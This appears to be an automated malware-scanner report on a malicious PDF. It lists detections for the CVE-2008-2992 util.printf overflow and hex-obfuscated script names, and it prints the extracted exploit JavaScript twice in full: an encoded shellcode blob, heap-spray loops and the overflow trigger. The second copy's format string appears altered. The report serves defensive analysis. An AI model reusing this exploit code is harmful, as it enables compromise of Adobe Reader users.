MALICIOUS
446
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 8
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var uW = unescape("%u9946%u3737%u4a9b%u9992%u9f98%u27f8%uf890%u4798%u9247%u4396%u4137%u2f2f%ufcfc%u4f27%u9899%u4b4f%u9740%u414e%u4997%u4f90%u9ff8%u9148%u40fd%ud6f8%u4ad6%u2f4a%uf9fd%uf890%u47fd%u404a%uf92f%u4947%u3749%u974e%uf937%ufc97%u4ef8%u4996%u9ff8%u9740%u3f42%u492f%u9092%u3f98%u4a40%u2f47%u4b4e%u4ef5%u4843%u46fd%u4892%u4142%u4a46%u47f9%u994b%u4949%u3f99%ufc96%u4afd%u9996%uf527%uf5d6%u9b9f%u4a92%u4641%u3f9b%u4f98%u2797%u9292%u9991%u4696%u3742%u494f%ufc46%u422f%ud6fd%u37d6%u4693%u4f2f%u4 … var oYTZbbOoC =""; -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x1B1 | 4833 bytes |
SHA-256: 60ca5df0e5f4a24976a0220405349e62ce32a82c6b88638296548282860a98a4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s). 9 of 15 identifiers look randomly generated (e.g. 'MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNF') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var uW = unescape("%u9946%u3737%u4a9b%u9992%u9f98%u27f8%uf890%u4798%u9247%u4396%u4137%u2f2f%ufcfc%u4f27%u9899%u4b4f%u9740%u414e%u4997%u4f90%u9ff8%u9148%u40fd%ud6f8%u4ad6%u2f4a%uf9fd%uf890%u47fd%u404a%uf92f%u4947%u3749%u974e%uf937%ufc97%u4ef8%u4996%u9ff8%u9740%u3f42%u492f%u9092%u3f98%u4a40%u2f47%u4b4e%u4ef5%u4843%u46fd%u4892%u4142%u4a46%u47f9%u994b%u4949%u3f99%ufc96%u4afd%u9996%uf527%uf5d6%u9b9f%u4a92%u4641%u3f9b%u4f98%u2797%u9292%u9991%u4696%u3742%u494f%ufc46%u422f%ud6fd%u37d6%u4693%u4f2f%u4191%u9ff8%u9042%u4f37%u9149%u922f%u374e%u2f42%u4147%uf93f%u424f%u9091%u9847%ufc4f%u9142%u4e98%u4f99%u43fc%u4ed6%u9743%u4799%u9298%u489f%u4f27%uf54f%u9191%u97fd%u273f%u48f9%u48f5%uf997%u3f4f%u4e40%u9ffc%uf899%u4690%uf999%u96fd%u27fc%u974f%u4ffd%u9092%u4f92%u9390%u3792%u4143%u924e%u929f%u3ff9%ud691%ufc90%u419f%u9b4b%u4f4a%u4b92%u4090%u9893%u9141%u994b%u4842%u4f27%u9f46%u3f2f%u41f9%u492f%u3749%u46fd%u9b4e%u4e3f%u9641%u924a%u4142%u9f99%u4191%u499f%u9291%u4343%u964b%u484a%u49f5%u994b%u4097%u4747%u274f%u4ffd%u9247%u3f47%u2799%u9198%u4f42%u9846%u46f5%u9090%u97d6%u919f%uf53f%u9397%u3f42%u3737%u4091%u4649%u4ff8%u434e%u4a40%u379f%u9b37%u904b%u4e43%u4f48%u4a9b%u98f9%u91fd%uf946%u374f%u9240%ufd2f%u4237%uf5d6%u92f5%u9946%ud6fc%uf542%u9298%ufd41%u4b2f%u9690%u9b3f%u9149%ufc49%u404b%u49f8%u4737%uf942%u4192%u92f8%u4347%u2f3f%u4e40%u9b97%u3740%u91fd%u4a96%u273f%u4efd%u4642%uf827%u3f96%u9097%u904e%ufc2f%u974e%ufc4b%u9f47%u904f%u4ed6%u9997%u4091%u4f90%u2f9f%ufc2f%u999b%u2790%u9f98%u9b9b%u4f27%u4b48%ufd4b%ud627%u9942%u4ffd%u4e46%u3f40%u4898%uf946%ufc37%u9990%u4198%ufd47%u4392%u2743%ud697%ufd4e%u914e%u3ffc%ufd37%ud693%u4927%u279b%u934e%u922f%u27f5%u4a98%u9741%u274b%u9741%u9bfd%ufdf8%u4a4e%u4992%u4ad6%u9199%uf8f9%u9292%uf949%u9b4e%u92d6%u4696%u99f5%u4790%ufc92%u919f%u46f5%u2740%u9237%ufdfd%u96f9%u9f48%uf547%ufc47%u4749%u9746%u412f%u9096%u924a%uf547%u414f%u9941%u4190%u9f41%u463f%u9343%u9f47%uf8f9%u40fc%u41f9%u4a42%u484f%u9b4e%u4691%u3f99%uf54b%u9992%u9796%ufc46%u4896%u42d6%u4248%u4af5%u9640%u3799%u96d6%u2f91%uf54f%u4e90%ufd4f%u3f2f%u4649%uf599%u9349%u483f%u40fd%u499b%u404f%u414b%u97d6%u4891%u9291%u499f%u4291%uf891%u994e%u2743%u4f97%u4e3f%u4f48%u2ff5%u4a9f%uf848%u494b%uf94a%u912f%uf946%uf991%u9943%u92fc%ud690%ufd4a%u9640%u4f91%u4897%u484a%u924f%u4737%u9846%u4893%u98f8%ufd3f%u4ffc%u9bf5%u434a%u4f4a%u974a%u97f5%u4696%u3747%u964f%u9ffc%u409b%uf997%u4643%ufd3f%u3790%u9b40%u40f5%u464f%u99d6%u9246%u92f5%u3799%u9190%u9ffc%u4898%uf537%ud0db%u81bf%u0928%ud988%u2474%u5af4%uc931%u31b1%u7a31%u8318%ufcea%u7a03%uca95%u74fc%u887d%u84ff%ued7d%u6176%u2d4c%ue1ec%u9dfe%ua766%u56f2%u5c2a%u1b81%u53e3%u9122%u5ad5%u8ab3%ufc26%ud137%ude7a%u1a06%u1f8f%u474f%u4d62%u0318%u62d1%u592d%u09ea%u4f7d%ued6a%u6e35%ua05b%u294e%u427b%u4183%u5c32%u6cc0%ud78c%u1a32%u3e0f%ue30b%u7fbc%u16a4%ub8bc%uc902%ub0cb%u7471%u06cc%ua208%u9d59%u21aa%u79f9%ue54b%u0a9c%u4247%u55ea%u554b%uee3f%ude77%u21be%ua4fe%ue5e4%u7e5b%ubc84%ud101%udfb9%u8eea%uab1f%uda06%uf62d%u1d4c%u8ca3%u1d22%u8ebb%u7612%u058a%u01fd%ucc13%ufeba%u4d59%u96ea%u0707%ufaaf%ufdb7%u02f3%uf434%uf08b%u7d24%ubd8e%u6de2%uaee2%u9186%uce51%uf182%u5c34%ud84e%ue4d3%u24f5");
var oYTZbbOoC ="";
for (hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP=128;hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP>=0;--hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP) oYTZbbOoC += unescape("%u49fd%ufd4b");
MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU = oYTZbbOoC + uW;
yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ = unescape("%u49fd%ufd4b");
uUgBLoeqCajgJtEEIHNCdSDzQLVwGUcbLNY = 20;
PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx = uUgBLoeqCajgJtEEIHNCdSDzQLVwGUcbLNY+MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU.length
while (yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.length<PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx) yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ+=yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ;
nYiTphahdIxI = yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.substring(0, PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx);
eTOvRfSbnZszuVa = yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.substring(0, yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.length-PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx);
while(eTOvRfSbnZszuVa.length+PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx < 0x40000) eTOvRfSbnZszuVa = eTOvRfSbnZszuVa+eTOvRfSbnZszuVa+nYiTphahdIxI;
rYmZNTwUdpxWnrVdGHFatyhomAaIyPdg = new Array();
for (RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO=0;RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO<1450;RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO++) rYmZNTwUdpxWnrVdGHFatyhomAaIyPdg[RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO] = eTOvRfSbnZszuVa + MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU;
util.printf("%45000.45000f", 0);
|
|||
javascript_obj0006_000_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 6 at offset 0x1B1 | 1024 bytes |
SHA-256: 01ae90eea1d8dc31c49900ac1d197a92a4c4e877185910e2caf472efa690ae09 |
|||
|
Detection
ClamAV:
Win.Trojan.MSShellcode-6360729-4
Obfuscation or payload:
unlikely
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 6 at offset 0x1B1 | 4831 bytes |
SHA-256: 1b1b3f9708e11c9b478a38aea7b94c1fec3844e832def57220afb8a2b033fb71 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s). 9 of 15 identifiers look randomly generated (e.g. 'MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNF') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var uW = unescape("%u9946%u3737%u4a9b%u9992%u9f98%u27f8%uf890%u4798%u9247%u4396%u4137%u2f2f%ufcfc%u4f27%u9899%u4b4f%u9740%u414e%u4997%u4f90%u9ff8%u9148%u40fd%ud6f8%u4ad6%u2f4a%uf9fd%uf890%u47fd%u404a%uf92f%u4947%u3749%u974e%uf937%ufc97%u4ef8%u4996%u9ff8%u9740%u3f42%u492f%u9092%u3f98%u4a40%u2f47%u4b4e%u4ef5%u4843%u46fd%u4892%u4142%u4a46%u47f9%u994b%u4949%u3f99%ufc96%u4afd%u9996%uf527%uf5d6%u9b9f%u4a92%u4641%u3f9b%u4f98%u2797%u9292%u9991%u4696%u3742%u494f%ufc46%u422f%ud6fd%u37d6%u4693%u4f2f%u4191%u9ff8%u9042%u4f37%u9149%u922f%u374e%u2f42%u4147%uf93f%u424f%u9091%u9847%ufc4f%u9142%u4e98%u4f99%u43fc%u4ed6%u9743%u4799%u9298%u489f%u4f27%uf54f%u9191%u97fd%u273f%u48f9%u48f5%uf997%u3f4f%u4e40%u9ffc%uf899%u4690%uf999%u96fd%u27fc%u974f%u4ffd%u9092%u4f92%u9390%u3792%u4143%u924e%u929f%u3ff9%ud691%ufc90%u419f%u9b4b%u4f4a%u4b92%u4090%u9893%u9141%u994b%u4842%u4f27%u9f46%u3f2f%u41f9%u492f%u3749%u46fd%u9b4e%u4e3f%u9641%u924a%u4142%u9f99%u4191%u499f%u9291%u4343%u964b%u484a%u49f5%u994b%u4097%u4747%u274f%u4ffd%u9247%u3f47%u2799%u9198%u4f42%u9846%u46f5%u9090%u97d6%u919f%uf53f%u9397%u3f42%u3737%u4091%u4649%u4ff8%u434e%u4a40%u379f%u9b37%u904b%u4e43%u4f48%u4a9b%u98f9%u91fd%uf946%u374f%u9240%ufd2f%u4237%uf5d6%u92f5%u9946%ud6fc%uf542%u9298%ufd41%u4b2f%u9690%u9b3f%u9149%ufc49%u404b%u49f8%u4737%uf942%u4192%u92f8%u4347%u2f3f%u4e40%u9b97%u3740%u91fd%u4a96%u273f%u4efd%u4642%uf827%u3f96%u9097%u904e%ufc2f%u974e%ufc4b%u9f47%u904f%u4ed6%u9997%u4091%u4f90%u2f9f%ufc2f%u999b%u2790%u9f98%u9b9b%u4f27%u4b48%ufd4b%ud627%u9942%u4ffd%u4e46%u3f40%u4898%uf946%ufc37%u9990%u4198%ufd47%u4392%u2743%ud697%ufd4e%u914e%u3ffc%ufd37%ud693%u4927%u279b%u934e%u922f%u27f5%u4a98%u9741%u274b%u9741%u9bfd%ufdf8%u4a4e%u4992%u4ad6%u9199%uf8f9%u9292%uf949%u9b4e%u92d6%u4696%u99f5%u4790%ufc92%u919f%u46f5%u2740%u9237%ufdfd%u96f9%u9f48%uf547%ufc47%u4749%u9746%u412f%u9096%u924a%uf547%u414f%u9941%u4190%u9f41%u463f%u9343%u9f47%uf8f9%u40fc%u41f9%u4a42%u484f%u9b4e%u4691%u3f99%uf54b%u9992%u9796%ufc46%u4896%u42d6%u4248%u4af5%u9640%u3799%u96d6%u2f91%uf54f%u4e90%ufd4f%u3f2f%u4649%uf599%u9349%u483f%u40fd%u499b%u404f%u414b%u97d6%u4891%u9291%u499f%u4291%uf891%u994e%u2743%u4f97%u4e3f%u4f48%u2ff5%u4a9f%uf848%u494b%uf94a%u912f%uf946%uf991%u9943%u92fc%ud690%ufd4a%u9640%u4f91%u4897%u484a%u924f%u4737%u9846%u4893%u98f8%ufd3f%u4ffc%u9bf5%u434a%u4f4a%u974a%u97f5%u4696%u3747%u964f%u9ffc%u409b%uf997%u4643%ufd3f%u3790%u9b40%u40f5%u464f%u99d6%u9246%u92f5%u3799%u9190%u9ffc%u4898%uf537%ud0db%u81bf%u0928%ud988%u2474%u5af4%uc931%u31b1%u7a31%u8318%ufcea%u7a03%uca95%u74fc%u887d%u84ff%ued7d%u6176%u2d4c%ue1ec%u9dfe%ua766%u56f2%u5c2a%u1b81%u53e3%u9122%u5ad5%u8ab3%ufc26%ud137%ude7a%u1a06%u1f8f%u474f%u4d62%u0318%u62d1%u592d%u09ea%u4f7d%ued6a%u6e35%ua05b%u294e%u427b%u4183%u5c32%u6cc0%ud78c%u1a32%u3e0f%ue30b%u7fbc%u16a4%ub8bc%uc902%ub0cb%u7471%u06cc%ua208%u9d59%u21aa%u79f9%ue54b%u0a9c%u4247%u55ea%u554b%uee3f%ude77%u21be%ua4fe%ue5e4%u7e5b%ubc84%ud101%udfb9%u8eea%uab1f%uda06%uf62d%u1d4c%u8ca3%u1d22%u8ebb%u7612%u058a%u01fd%ucc13%ufeba%u4d59%u96ea%u0707%ufaaf%ufdb7%u02f3%uf434%uf08b%u7d24%ubd8e%u6de2%uaee2%u9186%uce51%uf182%u5c34%ud84e%ue4d3%u24f5");
var oYTZbbOoC ="";
for (hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP=128;hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP>=0;--hDngKjtDnUZZrilZLNdcIKicqylLLZnmgLiIhcqzCiOzKVszmoRcHOEBCCbvIjZQP) oYTZbbOoC += unescape("%u49fd%ufd4b");
MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU = oYTZbbOoC + uW;
yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ = unescape("%u49fd%ufd4b");
uUgBLoeqCajgJtEEIHNCdSDzQLVwGUcbLNY = 20;
PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx = uUgBLoeqCajgJtEEIHNCdSDzQLVwGUcbLNY+MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU.length
while (yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.length<PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx) yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ+=yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ;
nYiTphahdIxI = yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.substring(0, PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx);
eTOvRfSbnZszuVa = yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.substring(0, yBBfvfdOMCabxXOePuZDVSfVbTDBHzalsZVZ.length-PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx);
while(eTOvRfSbnZszuVa.length+PLzXlmDtClqfHElTpWglhCdlslteKjRYeyabOkMjAtuCOgLXHEuZFx < 0x40000) eTOvRfSbnZszuVa = eTOvRfSbnZszuVa+eTOvRfSbnZszuVa+nYiTphahdIxI;
rYmZNTwUdpxWnrVdGHFatyhomAaIyPdg = new Array();
for (RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO=0;RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO<1450;RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO++) rYmZNTwUdpxWnrVdGHFatyhomAaIyPdg[RyDHNJlHPMerlMBKBNwfTbrFYxydsCkNO] = eTOvRfSbnZszuVa + MtTvMYnMQyEZWykbxqIUmQwaZBsDbGhgkrvhXGNFgERoHzwGsvHjlzznJfvmUZtMxMfgZraNqWJmAewXmoqU;
util.printf("E000.45000f", 0);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.